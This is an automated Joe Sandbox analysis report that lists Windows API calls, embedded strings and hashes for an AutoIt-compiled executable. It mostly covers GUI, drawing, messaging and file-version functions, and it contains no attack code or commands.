                                                            • Part of subcall function 0041A8CA: GetSysColor.USER32(00000012), ref: 0041A903
                                                            • Part of subcall function 0041A8CA: SetTextColor.GDI32(?,?), ref: 0041A907
                                                            • Part of subcall function 0041A8CA: GetSysColorBrush.USER32(0000000F), ref: 0041A91D
                                                            • Part of subcall function 0041A8CA: GetSysColor.USER32(0000000F), ref: 0041A928
                                                            • Part of subcall function 0041A8CA: GetSysColor.USER32(00000011), ref: 0041A945
                                                            • Part of subcall function 0041A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0041A953
                                                            • Part of subcall function 0041A8CA: SelectObject.GDI32(?,00000000), ref: 0041A964
                                                            • Part of subcall function 0041A8CA: SetBkColor.GDI32(?,00000000), ref: 0041A96D
                                                            • Part of subcall function 0041A8CA: SelectObject.GDI32(?,?), ref: 0041A97A
                                                            • Part of subcall function 0041A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0041A999
                                                            • Part of subcall function 0041A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0041A9B0
                                                            • Part of subcall function 0041A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0041A9C5
                                                            • Part of subcall function 0041A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0041A9ED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 3521893082-0
                                                          • Opcode ID: 60190d4d01504138148015ceba28fb96d843159c6ae6cf5b1dc4da33f5a11152
                                                          • Instruction ID: 9148ba81d275f904a2a620aa509db2561c85a2dca8936b5b9c64f479bfcaf703
                                                          • Opcode Fuzzy Hash: 60190d4d01504138148015ceba28fb96d843159c6ae6cf5b1dc4da33f5a11152
                                                          • Instruction Fuzzy Hash: D1918071009301FFC7119FA4DC08A9B7BA9FF48321F104B2AF966961E1D734D94ACB56
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?), ref: 00392CA2
                                                          • DeleteObject.GDI32(00000000), ref: 00392CE8
                                                          • DeleteObject.GDI32(00000000), ref: 00392CF3
                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00392CFE
                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00392D09
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 003CC43B
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003CC474
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 003CC89D
                                                            • Part of subcall function 00391B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00392036,?,00000000,?,?,?,?,003916CB,00000000,?), ref: 00391B9A
                                                          • SendMessageW.USER32(?,00001053), ref: 003CC8DA
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003CC8F1
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003CC907
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003CC912
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
                                                          • Opcode ID: 38c17fd703214b882224c22fbea33c9d86ce56e8e3473eed9ffcfe3899f1ad2b
                                                          • Instruction ID: 22c63d7fd79c4ea8971d6d874e86dfa84656404a93ba11dee665fa80690b8815
                                                          • Opcode Fuzzy Hash: 38c17fd703214b882224c22fbea33c9d86ce56e8e3473eed9ffcfe3899f1ad2b
                                                          • Instruction Fuzzy Hash: 7E128A30610601AFDB26DF24C884BAABBA5FF05300F59957DE899DB662C731EC46CF91
                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 004074DE
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040759D
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004075DB
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004075ED
                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00407633
                                                          • GetClientRect.USER32(00000000,?), ref: 0040763F
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00407683
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00407692
                                                          • GetStockObject.GDI32(00000011), ref: 004076A2
                                                          • SelectObject.GDI32(00000000,00000000), ref: 004076A6
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004076B6
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076BF
                                                          • DeleteDC.GDI32(00000000), ref: 004076C8
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004076F4
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0040770B
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00407746
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0040775A
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0040776B
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0040779B
                                                          • GetStockObject.GDI32(00000011), ref: 004077A6
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004077B1
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004077BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: b79f447453ef4a5c32a6a155364c443fe90cd7af6fb36b79fe38568f76e7ffc0
                                                          • Instruction ID: 35ffe1b3bc84769f4274870030b949e3807b56997b93bfe31bce76bac26f0803
                                                          • Opcode Fuzzy Hash: b79f447453ef4a5c32a6a155364c443fe90cd7af6fb36b79fe38568f76e7ffc0
                                                          • Instruction Fuzzy Hash: FEA18371A40605BFEB14DBA4DC4AFEE7B79EB08710F008125FA14A72E1D774AD01CB68
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003FAD1E
                                                          • GetDriveTypeW.KERNEL32(?,0041FAC0,?,\\.\,0041F910), ref: 003FADFB
                                                          • SetErrorMode.KERNEL32(00000000,0041FAC0,?,\\.\,0041F910), ref: 003FAF59
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: 2901ce9402530f39d5bd07d094e5845321dab60f2477e0b6ad3e338ffa27d16c
                                                          • Instruction ID: c08ab7a92b171e4d0b1ee5a5be8dec3fefeb7a8be2fd0c6c2c262ab3d52a6b2f
                                                          • Opcode Fuzzy Hash: 2901ce9402530f39d5bd07d094e5845321dab60f2477e0b6ad3e338ffa27d16c
                                                          • Instruction Fuzzy Hash: 3E51A3F0648B0DAB9B02EB10CD52EBD73A4EB58700730406BF60BAF691DA75AD41DB57
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 1038674560-86951937
                                                          • Opcode ID: cce3626110acd60d8f615f883ff26dddad3b27f740fb44abdd7e456b484e2429
                                                          • Instruction ID: 36062c1057e35a383538906ab2aea9d9a4525d09dd2286cac966b3a1e8b8db0c
                                                          • Opcode Fuzzy Hash: cce3626110acd60d8f615f883ff26dddad3b27f740fb44abdd7e456b484e2429
                                                          • Instruction Fuzzy Hash: E08111B1601215BADF23AA60EC43FAF3768AF05704F140029F905AF592EF61EE85D3A4
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00419AD2
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00419B8B
                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 00419BA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: 0
                                                          • API String ID: 2326795674-4108050209
                                                          • Opcode ID: 3ba6ce359abcc234e057c4b1bb4cee389fbfbd6205fcecdd2862020c76d0ccbc
                                                          • Instruction ID: a030ad1de5596b1001a93eba92c25aa7731ea18b93935b5b2c812d82698c4b81
                                                          • Opcode Fuzzy Hash: 3ba6ce359abcc234e057c4b1bb4cee389fbfbd6205fcecdd2862020c76d0ccbc
                                                          • Instruction Fuzzy Hash: F5029C30104301ABD715CF14C868BEBBBE5FF49314F04852EF999962A1D738DD96CB9A
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 0041A903
                                                          • SetTextColor.GDI32(?,?), ref: 0041A907
                                                          • GetSysColorBrush.USER32(0000000F), ref: 0041A91D
                                                          • GetSysColor.USER32(0000000F), ref: 0041A928
                                                          • CreateSolidBrush.GDI32(?), ref: 0041A92D
                                                          • GetSysColor.USER32(00000011), ref: 0041A945
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0041A953
                                                          • SelectObject.GDI32(?,00000000), ref: 0041A964
                                                          • SetBkColor.GDI32(?,00000000), ref: 0041A96D
                                                          • SelectObject.GDI32(?,?), ref: 0041A97A
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0041A999
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0041A9B0
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041A9C5
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0041A9ED
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041AA14
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0041AA32
                                                          • DrawFocusRect.USER32(?,?), ref: 0041AA3D
                                                          • GetSysColor.USER32(00000011), ref: 0041AA4B
                                                          • SetTextColor.GDI32(?,00000000), ref: 0041AA53
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0041AA67
                                                          • SelectObject.GDI32(?,0041A5FA), ref: 0041AA7E
                                                          • DeleteObject.GDI32(?), ref: 0041AA89
                                                          • SelectObject.GDI32(?,?), ref: 0041AA8F
                                                          • DeleteObject.GDI32(?), ref: 0041AA94
                                                          • SetTextColor.GDI32(?,?), ref: 0041AA9A
                                                          • SetBkColor.GDI32(?,?), ref: 0041AAA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: 2a0c0717e4d1e42daa46fee76d203ef48b9c7b549ca49778322f90046ca39d62
                                                          • Instruction ID: b1035bae9078fb9ab81f7b90d507b3c2d91edb182a0aabfcd63f8c7cefd15edb
                                                          • Opcode Fuzzy Hash: 2a0c0717e4d1e42daa46fee76d203ef48b9c7b549ca49778322f90046ca39d62
                                                          • Instruction Fuzzy Hash: 3D516C71901208FFDB119FA4DC48EEE7BB9EF08320F218626F915AB2A1D7759941CF94
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00418AC1
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00418AD2
                                                          • CharNextW.USER32(0000014E), ref: 00418B01
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00418B42
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00418B58
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00418B69
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00418B86
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00418BD8
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00418BEE
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00418C1F
                                                          • _memset.LIBCMT ref: 00418C44
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00418C8D
                                                          • _memset.LIBCMT ref: 00418CEC
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00418D16
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00418D6E
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00418E1B
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00418E3D
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00418E87
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00418EB4
                                                          • DrawMenuBar.USER32(?), ref: 00418EC3
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00418EEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: 1881397de695bd205a6794ef8f86814a251202dcf87995f5d74e44902a480987
                                                          • Instruction ID: 5d7542bcb4a648d215765058b96b3c65baafa436c6939f167b43e8722ed98c39
                                                          • Opcode Fuzzy Hash: 1881397de695bd205a6794ef8f86814a251202dcf87995f5d74e44902a480987
                                                          • Instruction Fuzzy Hash: D3E17070900208ABDF21DF50CC84EEF7B79EF09750F10815BFA15AA291DB789986DF69
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 004149CA
                                                          • GetDesktopWindow.USER32 ref: 004149DF
                                                          • GetWindowRect.USER32(00000000), ref: 004149E6
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414A48
                                                          • DestroyWindow.USER32(?), ref: 00414A74
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00414A9D
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00414ABB
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00414AE1
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00414AF6
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00414B09
                                                          • IsWindowVisible.USER32(?), ref: 00414B29
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00414B44
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00414B58
                                                          • GetWindowRect.USER32(?,?), ref: 00414B70
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00414B96
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00414BB0
                                                          • CopyRect.USER32(?,?), ref: 00414BC7
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00414C32
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: f60da2727e4f6a3262da727110d6e36b20b94dcf3b5d983bef99d71f35ba36af
                                                          • Instruction ID: a95ae149ee890944749919959a62275144201ecf9e01efd841553c09e8b76af8
                                                          • Opcode Fuzzy Hash: f60da2727e4f6a3262da727110d6e36b20b94dcf3b5d983bef99d71f35ba36af
                                                          • Instruction Fuzzy Hash: 12B18D71608340AFDB04DF64C845B9BBBE4BF88710F00892EF5999B2A1D775EC46CB59
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003F44AC
                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003F44D2
                                                          • _wcscpy.LIBCMT ref: 003F4500
                                                          • _wcscmp.LIBCMT ref: 003F450B
                                                          • _wcscat.LIBCMT ref: 003F4521
                                                          • _wcsstr.LIBCMT ref: 003F452C
                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003F4548
                                                          • _wcscat.LIBCMT ref: 003F4591
                                                          • _wcscat.LIBCMT ref: 003F4598
                                                          • _wcsncpy.LIBCMT ref: 003F45C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                          • API String ID: 699586101-1459072770
                                                          • Opcode ID: 4df67c9198b728f44bd389992790e692ad42c3fa9bd0aa2693ed938745cd0f0a
                                                          • Instruction ID: 6de865fb9063050136d5472f187e86e7fc905916626fa41e378d677cf1ce839a
                                                          • Opcode Fuzzy Hash: 4df67c9198b728f44bd389992790e692ad42c3fa9bd0aa2693ed938745cd0f0a
                                                          • Instruction Fuzzy Hash: 144107319002047BEB16BB748C47FFF776CDF42754F10016AFB08EA582EB389A0196A9
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003928BC
                                                          • GetSystemMetrics.USER32(00000007), ref: 003928C4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003928EF
                                                          • GetSystemMetrics.USER32(00000008), ref: 003928F7
                                                          • GetSystemMetrics.USER32(00000004), ref: 0039291C
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00392939
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00392949
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0039297C
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00392990
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 003929AE
                                                          • GetStockObject.GDI32(00000011), ref: 003929CA
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 003929D5
                                                            • Part of subcall function 00392344: GetCursorPos.USER32(?), ref: 00392357
                                                            • Part of subcall function 00392344: ScreenToClient.USER32(004557B0,?), ref: 00392374
                                                            • Part of subcall function 00392344: GetAsyncKeyState.USER32(00000001), ref: 00392399
                                                            • Part of subcall function 00392344: GetAsyncKeyState.USER32(00000002), ref: 003923A7
                                                          • SetTimer.USER32(00000000,00000000,00000028,00391256), ref: 003929FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI
                                                          • API String ID: 1458621304-248962490
                                                          • Opcode ID: 373bcf1977df61a639d94a2e5c8e396a4fd0795113402e0cb7562b87b4c69dd0
                                                          • Instruction ID: 24a98dfb5cad8db5de39a06699fcad0c75a2e19300f27b928c61fae1671f3d1f
                                                          • Opcode Fuzzy Hash: 373bcf1977df61a639d94a2e5c8e396a4fd0795113402e0cb7562b87b4c69dd0
                                                          • Instruction Fuzzy Hash: 9DB17971A0060AEFDF15EFA8CC45BAA7BA5FB08311F118129FA15E62A0DB74E851CB54
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 003EA47A
                                                          • __swprintf.LIBCMT ref: 003EA51B
                                                          • _wcscmp.LIBCMT ref: 003EA52E
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003EA583
                                                          • _wcscmp.LIBCMT ref: 003EA5BF
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 003EA5F6
                                                          • GetDlgCtrlID.USER32(?), ref: 003EA648
                                                          • GetWindowRect.USER32(?,?), ref: 003EA67E
                                                          • GetParent.USER32(?), ref: 003EA69C
                                                          • ScreenToClient.USER32(00000000), ref: 003EA6A3
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 003EA71D
                                                          • _wcscmp.LIBCMT ref: 003EA731
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 003EA757
                                                          • _wcscmp.LIBCMT ref: 003EA76B
                                                            • Part of subcall function 003B362C: _iswctype.LIBCMT ref: 003B3634
                                                          Strings
                                                          Memory Dump Source
